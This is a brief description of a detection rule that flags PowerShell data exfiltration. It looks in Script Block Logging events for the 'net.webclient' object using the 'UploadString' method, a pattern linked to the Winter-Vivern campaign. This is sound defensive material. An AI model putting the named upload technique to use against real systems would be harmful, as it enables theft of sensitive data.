This analytic rule identifies potential data exfiltration activities using PowerShell by monitoring for the `net.webclient` command with the `UploadString` method. It utilizes PowerShell Script Block Logging (EventCode 4104) to detect specific commands indicative of attempts to upload sensitive data, such as files or screenshots, to external URIs. The ability to intercept these specific script blocks allows security teams to pinpoint when malicious files are being transferred, commonly associated with malware campaigns like Winter-Vivern. If this behavior is confirmed as malicious, it can lead to unauthorized data leaks and systemic vulnerabilities throughout the environment. To implement this rule effectively, PowerShell Script Block Logging must be enabled on the necessary endpoints, further information can be found in the associated setup documentation.